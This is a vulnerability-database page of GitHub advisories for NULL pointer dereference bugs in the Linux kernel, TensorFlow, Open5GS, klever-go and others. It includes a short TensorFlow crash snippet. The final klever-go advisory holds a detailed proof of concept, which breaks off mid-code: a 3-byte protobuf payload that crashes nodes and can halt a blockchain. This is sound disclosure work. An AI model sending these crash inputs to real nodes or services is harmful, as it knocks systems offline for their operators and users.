CWE-476
AllowedNULL Pointer Dereference
Abstraction: Base · Status: Stable
The product dereferences a pointer that it expects to be valid but is NULL.
6310 vulnerabilities reference this CWE, most recent first.
GHSA-RJFQ-9QQJ-X2P2
Vulnerability from github – Published: 2025-03-14 00:30 – Updated: 2025-03-14 00:30In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu/cs: make commands with 0 chunks illegal behaviour.
Submitting a cs with 0 chunks, causes an oops later, found trying to execute the wrong userspace driver.
MESA_LOADER_DRIVER_OVERRIDE=v3d glxinfo
[172536.665184] BUG: kernel NULL pointer dereference, address: 00000000000001d8 [172536.665188] #PF: supervisor read access in kernel mode [172536.665189] #PF: error_code(0x0000) - not-present page [172536.665191] PGD 6712a0067 P4D 6712a0067 PUD 5af9ff067 PMD 0 [172536.665195] Oops: 0000 [#1] SMP NOPTI [172536.665197] CPU: 7 PID: 2769838 Comm: glxinfo Tainted: P O 5.10.81 #1-NixOS [172536.665199] Hardware name: To be filled by O.E.M. To be filled by O.E.M./CROSSHAIR V FORMULA-Z, BIOS 2201 03/23/2015 [172536.665272] RIP: 0010:amdgpu_cs_ioctl+0x96/0x1ce0 [amdgpu] [172536.665274] Code: 75 18 00 00 4c 8b b2 88 00 00 00 8b 46 08 48 89 54 24 68 49 89 f7 4c 89 5c 24 60 31 d2 4c 89 74 24 30 85 c0 0f 85 c0 01 00 00 <48> 83 ba d8 01 00 00 00 48 8b b4 24 90 00 00 00 74 16 48 8b 46 10 [172536.665276] RSP: 0018:ffffb47c0e81bbe0 EFLAGS: 00010246 [172536.665277] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000 [172536.665278] RDX: 0000000000000000 RSI: ffffb47c0e81be28 RDI: ffffb47c0e81bd68 [172536.665279] RBP: ffff936524080010 R08: 0000000000000000 R09: ffffb47c0e81be38 [172536.665281] R10: ffff936524080010 R11: ffff936524080000 R12: ffffb47c0e81bc40 [172536.665282] R13: ffffb47c0e81be28 R14: ffff9367bc410000 R15: ffffb47c0e81be28 [172536.665283] FS: 00007fe35e05d740(0000) GS:ffff936c1edc0000(0000) knlGS:0000000000000000 [172536.665284] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [172536.665286] CR2: 00000000000001d8 CR3: 0000000532e46000 CR4: 00000000000406e0 [172536.665287] Call Trace: [172536.665322] ? amdgpu_cs_find_mapping+0x110/0x110 [amdgpu] [172536.665332] drm_ioctl_kernel+0xaa/0xf0 [drm] [172536.665338] drm_ioctl+0x201/0x3b0 [drm] [172536.665369] ? amdgpu_cs_find_mapping+0x110/0x110 [amdgpu] [172536.665372] ? selinux_file_ioctl+0x135/0x230 [172536.665399] amdgpu_drm_ioctl+0x49/0x80 [amdgpu] [172536.665403] __x64_sys_ioctl+0x83/0xb0 [172536.665406] do_syscall_64+0x33/0x40 [172536.665409] entry_SYSCALL_64_after_hwframe+0x44/0xa9
Bug: https://gitlab.freedesktop.org/drm/amd/-/issues/2018
{
"affected": [],
"aliases": [
"CVE-2022-49335"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-26T07:01:10Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu/cs: make commands with 0 chunks illegal behaviour.\n\nSubmitting a cs with 0 chunks, causes an oops later, found trying\nto execute the wrong userspace driver.\n\nMESA_LOADER_DRIVER_OVERRIDE=v3d glxinfo\n\n[172536.665184] BUG: kernel NULL pointer dereference, address: 00000000000001d8\n[172536.665188] #PF: supervisor read access in kernel mode\n[172536.665189] #PF: error_code(0x0000) - not-present page\n[172536.665191] PGD 6712a0067 P4D 6712a0067 PUD 5af9ff067 PMD 0\n[172536.665195] Oops: 0000 [#1] SMP NOPTI\n[172536.665197] CPU: 7 PID: 2769838 Comm: glxinfo Tainted: P O 5.10.81 #1-NixOS\n[172536.665199] Hardware name: To be filled by O.E.M. To be filled by O.E.M./CROSSHAIR V FORMULA-Z, BIOS 2201 03/23/2015\n[172536.665272] RIP: 0010:amdgpu_cs_ioctl+0x96/0x1ce0 [amdgpu]\n[172536.665274] Code: 75 18 00 00 4c 8b b2 88 00 00 00 8b 46 08 48 89 54 24 68 49 89 f7 4c 89 5c 24 60 31 d2 4c 89 74 24 30 85 c0 0f 85 c0 01 00 00 \u003c48\u003e 83 ba d8 01 00 00 00 48 8b b4 24 90 00 00 00 74 16 48 8b 46 10\n[172536.665276] RSP: 0018:ffffb47c0e81bbe0 EFLAGS: 00010246\n[172536.665277] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000\n[172536.665278] RDX: 0000000000000000 RSI: ffffb47c0e81be28 RDI: ffffb47c0e81bd68\n[172536.665279] RBP: ffff936524080010 R08: 0000000000000000 R09: ffffb47c0e81be38\n[172536.665281] R10: ffff936524080010 R11: ffff936524080000 R12: ffffb47c0e81bc40\n[172536.665282] R13: ffffb47c0e81be28 R14: ffff9367bc410000 R15: ffffb47c0e81be28\n[172536.665283] FS: 00007fe35e05d740(0000) GS:ffff936c1edc0000(0000) knlGS:0000000000000000\n[172536.665284] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[172536.665286] CR2: 00000000000001d8 CR3: 0000000532e46000 CR4: 00000000000406e0\n[172536.665287] Call Trace:\n[172536.665322] ? amdgpu_cs_find_mapping+0x110/0x110 [amdgpu]\n[172536.665332] drm_ioctl_kernel+0xaa/0xf0 [drm]\n[172536.665338] drm_ioctl+0x201/0x3b0 [drm]\n[172536.665369] ? amdgpu_cs_find_mapping+0x110/0x110 [amdgpu]\n[172536.665372] ? selinux_file_ioctl+0x135/0x230\n[172536.665399] amdgpu_drm_ioctl+0x49/0x80 [amdgpu]\n[172536.665403] __x64_sys_ioctl+0x83/0xb0\n[172536.665406] do_syscall_64+0x33/0x40\n[172536.665409] entry_SYSCALL_64_after_hwframe+0x44/0xa9\n\nBug: https://gitlab.freedesktop.org/drm/amd/-/issues/2018",
"id": "GHSA-rjfq-9qqj-x2p2",
"modified": "2025-03-14T00:30:51Z",
"published": "2025-03-14T00:30:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-49335"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/15c3bcc9b5349d40207e5f8d4d799b8b4b7d13b8"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/20b947e5a3c74c5084d661c097517a554989d462"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/31ab27b14daaa75541a415c6794d6f3567fea44a"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/70276460e914d560e96bfc208695a872fe9469c9"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/7086a23890d255bb5761604e39174b20d06231a4"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/8189f44270db1be78169e11eec51a3eeb980bc63"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/aa25acbe96692e4bf8482311c293f72d8c6034c0"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/be585921f29df5422a39c952d188b418ad48ffab"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/c12984cdb077b9042d2dc20ca18cb16a87bcc774"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RJG6-J4Q2-2V5V
Vulnerability from github – Published: 2024-09-18 15:30 – Updated: 2024-09-20 21:31Unchecked Return Value to NULL Pointer Dereference vulnerability in Open Networking Foundation (ONF) libfluid (libfluid_msg module). This vulnerability is associated with program routine fluid_msg::ActionList::unpack10.
This issue affects libfluid: 0.1.0.
{
"affected": [],
"aliases": [
"CVE-2024-31196"
],
"database_specific": {
"cwe_ids": [
"CWE-476",
"CWE-690"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-09-18T14:15:19Z",
"severity": "MODERATE"
},
"details": "Unchecked Return Value to NULL Pointer Dereference vulnerability in Open Networking Foundation (ONF) libfluid (libfluid_msg module). This vulnerability is associated with program routine\u00a0fluid_msg::ActionList::unpack10.\n\nThis issue affects libfluid: 0.1.0.",
"id": "GHSA-rjg6-j4q2-2v5v",
"modified": "2024-09-20T21:31:39Z",
"published": "2024-09-18T15:30:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31196"
},
{
"type": "WEB",
"url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2024-31196"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-RJGF-248V-5JV2
Vulnerability from github – Published: 2024-12-04 15:31 – Updated: 2025-11-04 00:32In the Linux kernel, the following vulnerability has been resolved:
drm/rockchip: vop: Fix a dereferenced before check warning
The 'state' can't be NULL, we should check crtc_state.
Fix warning: drivers/gpu/drm/rockchip/rockchip_drm_vop.c:1096 vop_plane_atomic_async_check() warn: variable dereferenced before check 'state' (see line 1077)
{
"affected": [],
"aliases": [
"CVE-2024-53129"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-04T15:15:12Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/rockchip: vop: Fix a dereferenced before check warning\n\nThe \u0027state\u0027 can\u0027t be NULL, we should check crtc_state.\n\nFix warning:\ndrivers/gpu/drm/rockchip/rockchip_drm_vop.c:1096\nvop_plane_atomic_async_check() warn: variable dereferenced before check\n\u0027state\u0027 (see line 1077)",
"id": "GHSA-rjgf-248v-5jv2",
"modified": "2025-11-04T00:32:09Z",
"published": "2024-12-04T15:31:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-53129"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/1e53059729691ca4d905118258b9fbd17d854174"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/4e47b99a7764b23a431bff6a3f91dfe77d294765"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/656dbd1c21c2c088c70059cdd43ec83e7d54ec4d"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/ab1c793f457f740ab7108cc0b1340a402dbf484d"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/bbf8bc7e75863942028131ae39c23118f62de6c0"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RJM9-MQ62-F4FP
Vulnerability from github – Published: 2026-02-06 21:30 – Updated: 2026-02-06 21:30A vulnerability was identified in Open5GS up to 2.7.6. This affects the function sgwc_s5c_handle_modify_bearer_response/sgwc_sxa_handle_session_modification_response of the component PGW S5U Address Handler. The manipulation leads to null pointer dereference. The attack can be initiated remotely. The exploit is publicly available and might be used. The identifier of the patch is f1bbd7b57f831e2a070780a7d8d5d4c73babdb59. Applying a patch is the recommended action to fix this issue.
{
"affected": [],
"aliases": [
"CVE-2026-2062"
],
"database_specific": {
"cwe_ids": [
"CWE-404",
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-06T19:16:10Z",
"severity": "MODERATE"
},
"details": "A vulnerability was identified in Open5GS up to 2.7.6. This affects the function sgwc_s5c_handle_modify_bearer_response/sgwc_sxa_handle_session_modification_response of the component PGW S5U Address Handler. The manipulation leads to null pointer dereference. The attack can be initiated remotely. The exploit is publicly available and might be used. The identifier of the patch is f1bbd7b57f831e2a070780a7d8d5d4c73babdb59. Applying a patch is the recommended action to fix this issue.",
"id": "GHSA-rjm9-mq62-f4fp",
"modified": "2026-02-06T21:30:49Z",
"published": "2026-02-06T21:30:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2062"
},
{
"type": "WEB",
"url": "https://github.com/open5gs/open5gs/issues/4257"
},
{
"type": "WEB",
"url": "https://github.com/open5gs/open5gs/issues/4257#issue-3787701521"
},
{
"type": "WEB",
"url": "https://github.com/open5gs/open5gs/commit/f1bbd7b57f831e2a070780a7d8d5d4c73babdb59"
},
{
"type": "WEB",
"url": "https://github.com/open5gs/open5gs"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.344622"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.344622"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.744719"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-RJX6-V474-2CH9
Vulnerability from github – Published: 2022-11-21 22:17 – Updated: 2022-11-21 22:17Impact
An input encoded that is not a valid CompositeTensorVariant tensor will trigger a segfault in tf.raw_ops.CompositeTensorVariantToComponents.
import tensorflow as tf
encode = tf.raw_ops.EmptyTensorList(element_dtype=tf.int32, element_shape=[10, 15], max_num_elements=2)
meta= ""
component=[tf.int32]
print(tf.raw_ops.CompositeTensorVariantToComponents(encoded=encode,metadata=meta,Tcomponents=component))
Patches
We have patched the issue in GitHub commits bf594d08d377dc6a3354d9fdb494b32d45f91971 and 660ce5a89eb6766834bdc303d2ab3902aef99d3d.
The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.
For more information
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
Attribution
This vulnerability has been reported by pattarakritr@smu.edu.sg
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.8.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "2.9.0"
},
{
"fixed": "2.9.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "2.10.0"
},
{
"fixed": "2.10.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.8.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.8.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.9.0"
},
{
"fixed": "2.9.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.9.0"
},
{
"fixed": "2.9.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.10.0"
},
{
"fixed": "2.10.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.10.0"
},
{
"fixed": "2.10.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-41909"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-476"
],
"github_reviewed": true,
"github_reviewed_at": "2022-11-21T22:17:43Z",
"nvd_published_at": "2022-11-18T22:15:00Z",
"severity": "MODERATE"
},
"details": "### Impact\nAn input `encoded` that is not a valid `CompositeTensorVariant` tensor will trigger a segfault in [`tf.raw_ops.CompositeTensorVariantToComponents`](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/lib/core/py_func.cc).\n\n```python\nimport tensorflow as tf\n\nencode = tf.raw_ops.EmptyTensorList(element_dtype=tf.int32, element_shape=[10, 15], max_num_elements=2)\nmeta= \"\"\ncomponent=[tf.int32]\n\nprint(tf.raw_ops.CompositeTensorVariantToComponents(encoded=encode,metadata=meta,Tcomponents=component))\n```\n\n### Patches\nWe have patched the issue in GitHub commits [bf594d08d377dc6a3354d9fdb494b32d45f91971](https://github.com/tensorflow/tensorflow/commit/bf594d08d377dc6a3354d9fdb494b32d45f91971) and [660ce5a89eb6766834bdc303d2ab3902aef99d3d](https://github.com/tensorflow/tensorflow/commit/660ce5a89eb6766834bdc303d2ab3902aef99d3d).\n\nThe fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by pattarakritr@smu.edu.sg\n",
"id": "GHSA-rjx6-v474-2ch9",
"modified": "2022-11-21T22:17:43Z",
"published": "2022-11-21T22:17:43Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-rjx6-v474-2ch9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41909"
},
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/commit/660ce5a89eb6766834bdc303d2ab3902aef99d3d"
},
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/commit/bf594d08d377dc6a3354d9fdb494b32d45f91971"
},
{
"type": "PACKAGE",
"url": "https://github.com/tensorflow/tensorflow"
},
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/lib/core/py_func.cc"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Segfault in `CompositeTensorVariantToComponents`"
}
GHSA-RM26-P3F9-59XV
Vulnerability from github – Published: 2022-05-24 16:55 – Updated: 2023-02-04 00:30Symonics libmysofa 0.7 has a NULL pointer dereference in getHrtf in hrtf/reader.c.
{
"affected": [],
"aliases": [
"CVE-2019-16092"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-09-08T03:15:00Z",
"severity": "CRITICAL"
},
"details": "Symonics libmysofa 0.7 has a NULL pointer dereference in getHrtf in hrtf/reader.c.",
"id": "GHSA-rm26-p3f9-59xv",
"modified": "2023-02-04T00:30:37Z",
"published": "2022-05-24T16:55:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16092"
},
{
"type": "WEB",
"url": "https://github.com/hoene/libmysofa/compare/f571522...e07edb3"
},
{
"type": "WEB",
"url": "https://usn.ubuntu.com/4473-1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RM2H-RX39-6FC3
Vulnerability from github – Published: 2024-04-05 09:30 – Updated: 2025-03-28 00:31In the Linux kernel, the following vulnerability has been resolved:
vfio/fsl-mc: Block calling interrupt handler without trigger
The eventfd_ctx trigger pointer of the vfio_fsl_mc_irq object is initially NULL and may become NULL if the user sets the trigger eventfd to -1. The interrupt handler itself is guaranteed that trigger is always valid between request_irq() and free_irq(), but the loopback testing mechanisms to invoke the handler function need to test the trigger. The triggering and setting ioctl paths both make use of igate and are therefore mutually exclusive.
The vfio-fsl-mc driver does not make use of irqfds, nor does it support any sort of masking operations, therefore unlike vfio-pci and vfio-platform, the flow can remain essentially unchanged.
{
"affected": [],
"aliases": [
"CVE-2024-26814"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-05T09:15:09Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nvfio/fsl-mc: Block calling interrupt handler without trigger\n\nThe eventfd_ctx trigger pointer of the vfio_fsl_mc_irq object is\ninitially NULL and may become NULL if the user sets the trigger\neventfd to -1. The interrupt handler itself is guaranteed that\ntrigger is always valid between request_irq() and free_irq(), but\nthe loopback testing mechanisms to invoke the handler function\nneed to test the trigger. The triggering and setting ioctl paths\nboth make use of igate and are therefore mutually exclusive.\n\nThe vfio-fsl-mc driver does not make use of irqfds, nor does it\nsupport any sort of masking operations, therefore unlike vfio-pci\nand vfio-platform, the flow can remain essentially unchanged.",
"id": "GHSA-rm2h-rx39-6fc3",
"modified": "2025-03-28T00:31:28Z",
"published": "2024-04-05T09:30:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26814"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/083e750c9f5f4c3bf61161330fb84d7c8e8bb417"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/250219c6a556f8c69c5910fca05a59037e24147d"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/6ec0d88166dac43f29e96801c0927d514f17add9"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/7447d911af699a15f8d050dfcb7c680a86f87012"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/a563fc18583ca4f42e2fdd0c70c7c618288e7ede"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/de87511fb0404d23b6da5f4660383b6ed095e28d"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/ee0bd4ad780dfbb60355b99f25063357ab488267"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RM5C-5X2P-48WR
Vulnerability from github – Published: 2026-06-05 16:42 – Updated: 2026-06-09 18:40Summary
Every transaction gossiped on the klever-go P2P network is decoded and validated
synchronously inside the libp2p pubsub topic-validator callback. The validator
txVersionChecker.CheckTxVersion dereferences tx.RawData.Version with no nil
check. A protobuf Transaction whose embedded RawData sub-message is omitted
decodes to RawData == nil, so validating it triggers a nil-pointer panic.
The libp2p pubsub callback, the underlying go-libp2p-pubsub validation worker, and
klever's own network/p2p layer install no recover(), so the panic propagates and
crashes the entire node process. The attacker payload is a 3-byte protobuf message;
no validator key, stake, funds, or on-chain account is required. Aimed at enough of
the BLS validator set, repeated delivery halts block production (chain halt).
Affected component
- Root cause:
core/versioning/txVersionChecker.go:22 - Reached via:
core/process/transaction/interceptedTransaction.go:203(integrity) and:154(CheckValidity) - Production tx-topic path:
core/process/interceptors/multiDataInterceptor.go:171and:223 - Unprotected caller:
network/p2p/libp2p/netMessenger.gopubsubCallback(no recover) - Topic wiring:
core/process/factory/interceptorscontainer/baseInterceptorsContainerFactory.go(createOneTxInterceptor)
Details
Synchronous validation path, no recovery at any frame:
libp2p pubsubCallback network/p2p/libp2p/netMessenger.go (no recover)
-> MultiDataInterceptor.ProcessReceivedMessage core/process/interceptors/multiDataInterceptor.go:171
-> interceptedData(...) core/process/interceptors/multiDataInterceptor.go:223
-> InterceptedTransaction.CheckValidity core/process/transaction/interceptedTransaction.go:154
-> integrity() core/process/transaction/interceptedTransaction.go:203
-> txVersionChecker.CheckTxVersion(tx) core/versioning/txVersionChecker.go:22 <-- nil deref
Root cause (core/versioning/txVersionChecker.go):
func (tvc *txVersionChecker) CheckTxVersion(tx *transaction.Transaction) error {
if tx.RawData.Version < tvc.minTxVersion { // tx.RawData is nil -> panic
return process.ErrInvalidTransactionVersion
}
return nil
}
integrity() calls CheckTxVersion as its very first statement, before any
RawData nil-check, and CheckValidity() runs before the whitelist / originator-
election gate in the interceptor, so node-role and whitelist restrictions do not
protect this path.
Preconditions
- Attacker runs an ordinary libp2p peer reachable to the target via normal peering /
kad-dht discovery on the
transactionsgossip topic. - Production runs with
withMessageSigning = true, which only requires the gossip message to be signed by the attacker's OWN libp2p peer key (a self-generated identity; NOT a validator key, NOT funded, NOT authorized). - No special config or feature flag; the tx interceptor is built unconditionally and
subscribes to
transactionson every node.
Impact
- Deterministic, immediate crash of any targeted node (validator, sentry, or observer) from a single ~3-byte message.
- Gossipsub validates before relaying, so the victim does not forward the crashing message; the attacker delivers it directly to each target (one tiny message/node).
- With auto-restart (systemd), re-sending sustains the outage.
- Directed at > 1/3 of the BLS validator set, this prevents consensus and halts the chain.
- NOTE: the HTTP
POST /transaction/sendpath is NOT crash-exploitable - the REST server usesgin.Default()(Recovery middleware) and returns HTTP 500. The exploitable vector is the P2P interceptor.
Exploit cost / attack complexity
- Cost: negligible (one self-signed libp2p peer; 3-byte payload; no gas/capital).
- Complexity: LOW. Unauthenticated, remote, deterministic.
PoC-Source
Scenario
- Build the malicious transaction as it appears on the wire: a protobuf Transaction
with RawData omitted (plus a throwaway Signature so the batch entry looks like a
real tx). With the production proto marshalizer this encodes to 3 bytes
(12 01 78) and round-trips back to RawData == nil.
- Feed it through the REAL production interceptors. The transactions gossip topic is
served by a MultiDataInterceptor (baseInterceptorsContainerFactory.go,
createOneTxInterceptor); the test wraps the tx in a Batch exactly like a bulk-tx
gossip message and calls ProcessReceivedMessage, which is precisely what the
panic-free libp2p pubsubCallback invokes in production. A second test drives the
generic SingleDataInterceptor to show the bug is in the shared validation chain.
- The data factory is a faithful copy of the production interceptedTxDataFactory.Create:
it builds a genuine *InterceptedTransaction. No validation behavior is stubbed;
only leaf crypto/marshal helpers use the repo's own in-tree mocks. The panic occurs
on the first line of integrity(), upstream of any mock.
How to run
1. git clone https://github.com/klever-io/klever-go && cd klever-go
(Go toolchain matching go.mod go 1.25.7; verified locally on go1.26.3.)
2. Save the source below as core/process/interceptors/poc_nil_rawdata_dos_test.go.
3. Run either (separately - the first panic aborts the test binary):
- Production tx-topic path: go test ./core/process/interceptors/ -run TestPoC_NilRawData_MultiDataInterceptor -v
- Generic path: go test ./core/process/interceptors/ -run TestPoC_NilRawData_SingleDataInterceptor -v
- Dependencies: none beyond the repo's own go.mod (uses in-repo mocks only).
Full PoC source (poc_nil_rawdata_dos_test.go):
// Target component: klever-go P2P transaction interceptor (network availability)
// core/process/transaction/interceptedTransaction.go
// core/versioning/txVersionChecker.go:22
// Vulnerability type: Unauthenticated remote Denial-of-Service (nil-pointer panic / chain-wide node crash)
// CWE-476 (NULL Pointer Dereference) reached from untrusted P2P input.
//
// Summary:
// Every gossiped transaction is decoded and validated synchronously inside the
// libp2p pubsub topic-validator callback
// (network/p2p/libp2p/netMessenger.go -> pubsubCallback). That callback has NO
// recover(). The validation chain is:
//
// (Multi|Single)DataInterceptor.ProcessReceivedMessage
// -> InterceptedTransaction.CheckValidity
// -> integrity()
// -> txVersionChecker.CheckTxVersion(tx) // tx.RawData.Version <-- nil deref
//
// CheckTxVersion dereferences tx.RawData.Version with no nil guard. A protobuf
// Transaction whose embedded RawData message is omitted unmarshals fine (RawData==nil),
// so an unauthenticated peer can broadcast a few bytes that panic the validation
// goroutine and crash the entire node process. Repeating it against the validator
// set halts consensus.
//
// How to run:
// 1) git clone https://github.com/klever-io/klever-go && cd klever-go
// 2) cp <this file> core/process/interceptors/poc_nil_rawdata_dos_test.go
// 3) go test ./core/process/interceptors/ -run TestPoC_NilRawData -v
//
// Expected output:
// The test process aborts with:
// panic: runtime error: invalid memory address or nil pointer dereference
// ... core/versioning.(*txVersionChecker).CheckTxVersion ... txVersionChecker.go:22
// ... InterceptedTransaction.integrity ... -> CheckValidity
// ... (Multi|Single)DataInterceptor.ProcessReceivedMessage
// i.e. the crash originates from the interceptor's synchronous message-handling frame,
// exactly where the panic-free libp2p pubsub callback would call it in production.
//
// Dependencies: none beyond the repo's own go.mod (uses in-repo mocks only).
package interceptors_test
import (
"testing"
"github.com/klever-io/klever-go/common/mock"
"github.com/klever-io/klever-go/core"
"github.com/klever-io/klever-go/core/process"
"github.com/klever-io/klever-go/core/process/interceptors"
txproc "github.com/klever-io/klever-go/core/process/transaction"
"github.com/klever-io/klever-go/core/throttler"
"github.com/klever-io/klever-go/core/versioning"
cryptoMock "github.com/klever-io/klever-go/crypto/mock"
"github.com/klever-io/klever-go/data/batch"
dataTransaction "github.com/klever-io/klever-go/data/transaction"
)
// buildMaliciousTxBytes returns the proto wire-bytes of a Transaction whose RawData
// field is omitted. This is the entire attacker payload.
func buildMaliciousTxBytes(t *testing.T) []byte {
m := &mock.ProtoMarshalizerMock{}
maliciousTx := &dataTransaction.Transaction{ /* RawData: nil */ }
buff, err := m.Marshal(maliciousTx)
